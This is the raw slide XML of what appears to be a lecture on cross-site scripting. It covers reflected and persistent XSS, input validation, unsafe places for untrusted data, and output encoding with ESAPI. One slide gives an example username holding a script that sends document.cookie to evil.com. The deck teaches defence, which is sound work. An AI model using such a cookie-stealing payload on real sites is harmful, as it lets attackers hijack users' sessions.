            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1411" name="Google Shape;1411;p202"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4797150" y="2161000"/>
            <a:ext cx="4502700" cy="4502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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5411950" y="3463800"/>
            <a:ext cx="3697200" cy="167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What if user.name is “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>&lt;script&gt;(new Image()).src=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>"http://evil.com/" + document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr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marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="160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2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 vs. Persistence </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1418" name="Google Shape;1418;p203"/>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a:t>One </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>reflects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> your input onto the page (e.g. “No results found for &lt;your query&gt;”)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>One </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>persists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> in the database (e.g. Posting a comment on a blog) or a cookie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204"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="1424" name="Google Shape;1424;p204"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429300" y="1058650"/>
            <a:ext cx="7424400" cy="37095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6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Validate input server side</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Validate client side to improve UI/UX, e.g. email address looks valid in a form</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Server side to sanitize and encode data, e.g. email address </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>isn’t JavaScript code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Don’t rely on the browser to validate your input, there are </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>other ways to submit data!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Prefer well-known language, framework, or library validators</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PHP e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>filter_var($user_input, FILTER_VALIDATE_EMAIL);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Validate input with well-tested regular </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>expressions as a last resort</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Integers look like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>‘[0-9]+’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, IKEYs look like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>‘[A-Z0-9]{20}’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, etc.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Input validation is a step in the right direction, but not enough!</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1425" name="Google Shape;1425;p204"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7539800" y="1560749"/>
            <a:ext cx="2413625" cy="2416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205"/>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 Location of Untrusted Data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1431" name="Google Shape;1431;p205"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429300" y="1058650"/>
            <a:ext cx="8285400" cy="3709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Directly in a script</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>...NEVER PUT UNTRUSTED DATA HERE...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Inside HTML comments</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>&lt;!--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>...NEVER PUT UNTRUSTED DATA HERE...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>--&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In an attribute name</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>&lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>...NEVER PUT UNTRUSTED DATA HERE...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>=test /&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Directly in CSS</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>&lt;style&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>...NEVER PUT UNTRUSTED DATA HERE...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>&lt;/style&gt;</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206"/>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Escape Data in Allowed Locations</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1437" name="Google Shape;1437;p206"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429300" y="1058650"/>
            <a:ext cx="8285400" cy="3709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Use Enterprise Security API (ESAPI) libraries</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-292100" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Username: &lt;script&gt;alert(“These are not the usernames you’re looking for…”);&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-292100" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>print → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:highlight>
                  <a:srgbClr val="EA9999"/>
                </a:highlight>
              </a:rPr>
              <a:t>&lt;script&gt;alert(...);&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EA9999"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:highlight>
                  <a:srgbClr val="EA9999"/>
                </a:highlight>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="EA9999"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-292100" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>esapi.encode_for_html → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:highlight>
                  <a:srgbClr val="B6D7A8"/>
                </a:highlight>
              </a:rPr>
              <a:t>&amp;lt;script&amp;gt;alert&amp;#x28; … &amp;#x29;&amp;#x3b;&amp;lt;&amp;#x2f;script&amp;gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:highlight>
                  <a:srgbClr val="B6D7A8"/>
                </a:highlight>
              </a:rPr>
              <a:t>OK</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:highlight>
                <a:srgbClr val="B6D7A8"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1438" name="Google Shape;1438;p206"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="21346" t="36459"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4837500" y="2292625"/>
            <a:ext cx="3737175" cy="2475525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1439" name="Google Shape;1439;p206"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="466500" y="2776975"/>
          <a:ext cx="8248200" cy="1283369"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{33D0C5A7-A392-4A63-A77E-500D87993C42}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4124100">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4124100">
                  <a:extLst>
